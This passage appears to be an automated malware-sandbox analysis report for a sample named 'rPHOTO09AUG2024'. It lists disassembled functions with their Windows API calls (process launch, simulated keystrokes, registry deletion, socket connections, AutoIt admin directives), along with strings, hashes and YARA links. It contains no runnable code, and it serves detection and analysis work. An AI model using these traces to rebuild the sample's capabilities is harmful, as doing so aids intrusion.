Instruction Fuzzy Hash: 8F714C34900109EFCB04CF58CC89ABEBB79FF85324F148159F919AA251D734AA91CF74

Function 00DCB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01155980), ref: 00DCB6A5
IsWindowEnabled.USER32(01155980), ref: 00DCB6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00DCB795
SendMessageW.USER32(01155980,000000B0,?,?), ref: 00DCB7CC
IsDlgButtonChecked.USER32(?,?), ref: 00DCB809
GetWindowLongW.USER32(01155980,000000EC), ref: 00DCB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DCB843

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 82e3472d039768ea8c2d9c2fd4ef3eea6cfcfcc8ae12970ad79e6ab2c1926320
Instruction ID: 4008ee9995e0bca28da2ce9c6f2e76dac05b6f481a60dcad32dd50c420f0415c
Opcode Fuzzy Hash: 82e3472d039768ea8c2d9c2fd4ef3eea6cfcfcc8ae12970ad79e6ab2c1926320
Instruction Fuzzy Hash: 97719134640306AFDB259F64C896FAA7BB9EF49320F18445EE945A73A1C731E851CF70

Function 00DBF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DBF75C
_memset.LIBCMT ref: 00DBF825
ShellExecuteExW.SHELL32(?), ref: 00DBF86A

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

Part of subcall function 00D5FEC6: _wcscpy.LIBCMT ref: 00D5FEE9

GetProcessId.KERNEL32(00000000), ref: 00DBF8E1
CloseHandle.KERNEL32(00000000), ref: 00DBF910

Strings

@, xrefs: 00DBF839

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 53069e0a493409c8e8322a479ae2fc5cc6f176cf4651e11d232164c66dca9afb
Instruction ID: e38c9cc6b22e5abca6c03d4f619cd9c0f9c80f874bfaeb8e39ab2114fdb84c60
Opcode Fuzzy Hash: 53069e0a493409c8e8322a479ae2fc5cc6f176cf4651e11d232164c66dca9afb
Instruction Fuzzy Hash: 67614AB5A00619DFCF14DF65C9919AEBBB5FF48310B148469E85AAB351CB30AE41CBB0

Function 00DA145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00DA149C
GetKeyboardState.USER32(?), ref: 00DA14B1
SetKeyboardState.USER32(?), ref: 00DA1512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00DA1540
PostMessageW.USER32(?,00000101,00000011,?), ref: 00DA155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00DA15A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DA15C8

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8a36316a1600670dcf162fc90ad80b3f169ba1ddd2d3451390c1b266ce255f29
Instruction ID: 33770d96e585f1a7d758029f3c4b5d0998a9ebdd499a6f0ce32dd77167b4ab58
Opcode Fuzzy Hash: 8a36316a1600670dcf162fc90ad80b3f169ba1ddd2d3451390c1b266ce255f29
Instruction Fuzzy Hash: E451B3A4A047D63EFB3647388C45BBABEA96B47304F0C8589E1D5968D2D3D4EC88D770

Function 00DA1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00DA12B5
GetKeyboardState.USER32(?), ref: 00DA12CA
SetKeyboardState.USER32(?), ref: 00DA132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DA1357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DA1374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DA13B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DA13D9

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6071a4082006d54755e8bc1652431f51bb85f53bb73cbf3a34875f1434f53c94
Instruction ID: 6d0fc73d78326c4b1929f2618f910d25c458bedb839c3d7d2361bb38b044603b
Opcode Fuzzy Hash: 6071a4082006d54755e8bc1652431f51bb85f53bb73cbf3a34875f1434f53c94
Instruction Fuzzy Hash: 7D51F3A49047D67DFB3287248C55BBABFA9AB07300F0C8589E1D48A8C2D395EC98D770

Function 00DA589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00DA58AC
_wcsncpy.LIBCMT ref: 00DA58E1
_wcsncpy.LIBCMT ref: 00DA5913
_wcsncpy.LIBCMT ref: 00DA5946
_wcsncpy.LIBCMT ref: 00DA5988
_wcsncpy.LIBCMT ref: 00DA59C2
_wcsncpy.LIBCMT ref: 00DA59F1

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 91cc0a41c5208359a439804e27e239787f91c6785cd3b542dfebb481707f536f
Instruction ID: 15002b120589c6c921a1c8a5ccbb831e12b0f1bfb962f15ff25bfcc670a33f32
Opcode Fuzzy Hash: 91cc0a41c5208359a439804e27e239787f91c6785cd3b542dfebb481707f536f
Instruction Fuzzy Hash: 574181A5D2062877CB10EBB898869DFB3A8EF05310F508566F518E3162F734E715C7B9

Function 00DA38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DA38D3,?), ref: 00DA48C7

Part of subcall function 00DA48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DA38D3,?), ref: 00DA48E0

lstrcmpiW.KERNEL32(?,?), ref: 00DA38F3
_wcscmp.LIBCMT ref: 00DA390F
MoveFileW.KERNEL32(?,?), ref: 00DA3927
_wcscat.LIBCMT ref: 00DA396F
SHFileOperationW.SHELL32(?), ref: 00DA39DB

Strings

\*.*, xrefs: 00DA3969

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 07d2edef450882f56e149f835345033f7902d25bd6d8cf444e9c924604e1848a
Instruction ID: b280205caa34efe2ec7a936b595b811af938b79af681c8aaee78f8813c59a2a5
Opcode Fuzzy Hash: 07d2edef450882f56e149f835345033f7902d25bd6d8cf444e9c924604e1848a
Instruction Fuzzy Hash: 15418FB25083459AC755EF64C481AEBB7E8EF8A340F04092EB489C3151EB74D788CB72

Function 00DC7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DC7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DC75C0
IsMenu.USER32(?), ref: 00DC75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DC7620
DrawMenuBar.USER32 ref: 00DC7633

Strings

0, xrefs: 00DC750D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: da565b630bcf904409f32606245e424946991e6a0c2793319d587f3b849806ee
Instruction ID: 439c727b108cef7cf9fb553f99612c0868fdf2e4c7c99c6cc5f42f9a8ee08062
Opcode Fuzzy Hash: da565b630bcf904409f32606245e424946991e6a0c2793319d587f3b849806ee
Instruction Fuzzy Hash: 6F412775A0460AEFDB20DF54D885E9ABBF9FB08310F088129F955A7290D731ED54CFA0

Function 00DC122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00DC125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DC1286
FreeLibrary.KERNEL32(00000000), ref: 00DC133D

Part of subcall function 00DC122D: RegCloseKey.ADVAPI32(?), ref: 00DC12A3
Part of subcall function 00DC122D: FreeLibrary.KERNEL32(?), ref: 00DC12F5
Part of subcall function 00DC122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DC1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 00DC12E0

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 9658161770fad72ce3569c537f0a251577c0820620c5c1d2088ff8c43b6c8157
Instruction ID: e9b66c3a939b5d7e0bb7e93ad8582b7c07dcf3f7a0a248144ff80d23d332550f
Opcode Fuzzy Hash: 9658161770fad72ce3569c537f0a251577c0820620c5c1d2088ff8c43b6c8157
Instruction Fuzzy Hash: 1B314BB590122ABFDB15DF90DC89EFEB7BCEF09304F044169E501E3252EA749E459AB0

Function 00DC653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DC655B
GetWindowLongW.USER32(01155980,000000F0), ref: 00DC658E
GetWindowLongW.USER32(01155980,000000F0), ref: 00DC65C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00DC65F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00DC661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00DC6630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DC664A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 5f9d7c93faa69a3bf6fac820c4cbbdee3dc29d10ae0f0e613b3d27d77a1e3f22
Instruction ID: 2cbdd8d803a7aa1e2060ffce6fa1f996dde20249acb9291edb7f7cc3d374bfd5
Opcode Fuzzy Hash: 5f9d7c93faa69a3bf6fac820c4cbbdee3dc29d10ae0f0e613b3d27d77a1e3f22
Instruction Fuzzy Hash: 4E310230654252AFDB20CF19DC84F653BE1FB4A314F2841A8F501DB2B6CB72E894DB61

Function 00DB6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00DB80CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00DB64D9
WSAGetLastError.WSOCK32(00000000), ref: 00DB64E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00DB6521
connect.WSOCK32(00000000,?,00000010), ref: 00DB652A
WSAGetLastError.WSOCK32 ref: 00DB6534
closesocket.WSOCK32(00000000), ref: 00DB655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00DB6576

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 16ba5979896a79227f52e09d6c5904e4e8371fd78285fc3ed3df4fb162c815db
Instruction ID: 777e6d1ecb49e9bf0be69b8ee3617bc20def8220b258cd31c04cd5384674c802
Opcode Fuzzy Hash: 16ba5979896a79227f52e09d6c5904e4e8371fd78285fc3ed3df4fb162c815db
Instruction Fuzzy Hash: D0316C71600219ABDB10AF24C885FFE7BA9EF45754F048069F94AD7291DB74A904CAB1

Function 00D9E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9E120
SysAllocString.OLEAUT32(00000000), ref: 00D9E123
SysAllocString.OLEAUT32 ref: 00D9E144
SysFreeString.OLEAUT32 ref: 00D9E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 00D9E167
SysAllocString.OLEAUT32(?), ref: 00D9E175

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d87cbafb303662ef0200cbddbafc9d839f3356929611e67b7651bbfc2bd3f648
Instruction ID: 548e2d4bab582ab09a4b6e90cc6424a0994afc63a9d33d85d84ec9b2269c7514
Opcode Fuzzy Hash: d87cbafb303662ef0200cbddbafc9d839f3356929611e67b7651bbfc2bd3f648
Instruction Fuzzy Hash: 6C218E35604319AFDF10DFA8DC88DAB77ADEB09760B048225F955DB260DA71DC418B70

Function 00D9FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D9FB81
__wcsnicmp.LIBCMT ref: 00D9FBA2
__wcsnicmp.LIBCMT ref: 00D9FBBC

Strings

#notrayicon, xrefs: 00D9FB79
#OnAutoItStartRegister, xrefs: 00D9FBB6
#requireadmin, xrefs: 00D9FB9C

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: a44e00fc62fd9db60599770a6e381cfb8e6d4c2232d92afe6fe8f0fa05b73046
Instruction ID: dd1ba89f8ce3cb93c995be47cdc6a63c30e3653e26d4544404efbc60a3b2bf67
Opcode Fuzzy Hash: a44e00fc62fd9db60599770a6e381cfb8e6d4c2232d92afe6fe8f0fa05b73046
Instruction Fuzzy Hash: 44213432204251ABDB30AB24DC52EBB7398EF61358F188036F886C7181EB51E982D2B1

Function 00DC783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D41D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D41D73
Part of subcall function 00D41D35: GetStockObject.GDI32(00000011), ref: 00D41D87
Part of subcall function 00D41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D41D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DC78A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DC78AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DC78B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DC78C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DC78D4

Strings

Msctls_Progress32, xrefs: 00DC7872

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: a90b0fe5dfecdab5848c6199bb26794e49043dc3bf83bba66e7dace37728078e
Instruction ID: 39ccc2225282a916f2f098a6f3b55ac3bd67346c45e93c61c5c9278afc9f94a9
Opcode Fuzzy Hash: a90b0fe5dfecdab5848c6199bb26794e49043dc3bf83bba66e7dace37728078e
Instruction Fuzzy Hash: 82117CB655021ABFEB159E60CC85EE77F6DEF08768F014115BA04A2090C7729C21DBB0

Function 00D641C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00D64292,?), ref: 00D641E3
GetProcAddress.KERNEL32(00000000), ref: 00D641EA
EncodePointer.KERNEL32(00000000), ref: 00D641F6
DecodePointer.KERNEL32(00000001,00D64292,?), ref: 00D64213

Strings

RoInitialize, xrefs: 00D641D2
combase.dll, xrefs: 00D641DE

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: ece5d44fa5c2cd0969841b3b3750ac6f81a12b9b0cd8dc672176903ececbfd5f
Instruction ID: 2a0533dc817b3f0d4d55389733a846e496a88c3883f84b345679ebb7ee3893d4
Opcode Fuzzy Hash: ece5d44fa5c2cd0969841b3b3750ac6f81a12b9b0cd8dc672176903ececbfd5f
Instruction Fuzzy Hash: 77E012F0591342AFDB107BB1ED09F543596B765702F104424F591E52E0D7B640D9CF64

Function 00D6429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00D641B8), ref: 00D642B8
GetProcAddress.KERNEL32(00000000), ref: 00D642BF
EncodePointer.KERNEL32(00000000), ref: 00D642CA
DecodePointer.KERNEL32(00D641B8), ref: 00D642E5

Strings

RoUninitialize, xrefs: 00D642A7
combase.dll, xrefs: 00D642B3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 3cfaaf61b615ca68efcd46f37ce89814bb405040d40c52eb50291c59e5271018
Instruction ID: faff909387567b32a9bdaee6881661dcb4b794e1f358c22cc3800b93da5013f5
Opcode Fuzzy Hash: 3cfaaf61b615ca68efcd46f37ce89814bb405040d40c52eb50291c59e5271018
Instruction Fuzzy Hash: 34E0BFF8582302AFDB109B62ED0DF553AA6B728742F244025F101E12E4CBB5458CCA38

Function 00DA675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DA68AD
_memmove.LIBCMT ref: 00DA67E8

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

_memmove.LIBCMT ref: 00DA685B
_memmove.LIBCMT ref: 00DA6942
_memmove.LIBCMT ref: 00DA695B
_memmove.LIBCMT ref: 00DA6977

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

